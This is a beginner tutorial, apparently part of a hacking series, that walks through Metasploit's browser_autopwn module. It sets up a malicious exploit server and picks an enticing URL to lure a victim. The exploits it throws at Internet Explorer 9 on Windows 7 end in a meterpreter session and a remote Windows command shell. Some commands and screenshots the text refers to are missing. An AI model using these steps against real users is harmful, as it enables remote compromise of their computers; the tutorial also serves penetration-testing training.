The beauty of autopwn is that it relieves you of some of the hard work of reconnaissance. Autopwn will first try to fingerprint the victim’s browser, then “throw” at it whatever exploits it thinks might work. It makes life quite simple. The downside of autopwn is that it is very noisy and can lead to either detection by the target or crashing the browser, which happens often.
Let’s take a look at it now.
Let’s fire up Kali and start Metasploit with the command:
kali > msfconsole
To get started with any exploit, generally we start with the use command. Since the autopwn module is located at auxiliary/server/browser_autopwn, we get started by typing:
This will load the module. Then, to get more information on this module, let’s type:
msf > auxiliary(browser_autopwn) > info
As you can see in the screenshots above and below, this provides us with all the information we need to get started, including each of the options and a brief description of the module.
msf > show options
As you can see, we need to set:
The LHOST is the local host. In other words , our Kali attack system. Since mine is at 192.168.1. 106, I type:
msf > set LHOST 192.168.1.106
Now we need to create a URIPATH. This is the URL that we want the exploits to be located at on our malicious server. We can call it anything we want or we could leave it blank and Metasploit will set it to a default string. Since we are trying to entice our victim to click on this link, let’s try to make it inviting and use the name of our favorite hacker training site, Null Byte.
msf > set URIPATH null_byte
To get started, that’s all we need to set.
Finally, let’s type exploit:
msf > exploit
This will start the autopwn module. It starts numerous servers and then loads the exploits that may work against that browser. Each one represents a different possible vulnerability in our browser. Be patient as this takes awhile.
Notice in the middle of the above screenshot that it loaded 20 exploit modules.
Now from a Windows 7 system with Internet Explorer 9, when the target navigates to our webserver at 192.168.1.106:8080/null_byte, they will get this warning from IE:
Back on our Kali system, autopwn is fingerprinting the browser and trying to determine which of the exploits will work.
Note in the middle of this screenshot that autopwn is “responding with 13 exploits.” It will now begin trying each of those exploits against the browser with the hope that at least one will work.
Finally, let’s go back to our Kali system and see whether any sessions have opened by typing:
When we do, Metasploit will list all our active sessions. Looks like I only have one.
To connect to that meterpreter session, we simply type:
sessions -i 1
Where 1 is the ID of our session from the previous command. (See it to the far left column?) This will then connect me to my meterpreter connection that looks like this:
This is my direct connection into the Windows 7 machine. When I type:
meterpreter > shell
it drops me into a Windows command prompt shell like below.
Depending upon the browser and its configuration, you might get several meterpreter sessions, you might get one like I did, or you might get none. In the worst case, all of the exploits running against the browser can crash the browser.
Although autopwn is a good Metasploit training tool, it is less than stealthy and often will overwhelm the browser with exploits and crash it. Keep coming back, my novice hackers, as we explore the inner workings my favorite hacking tool,Metasploit!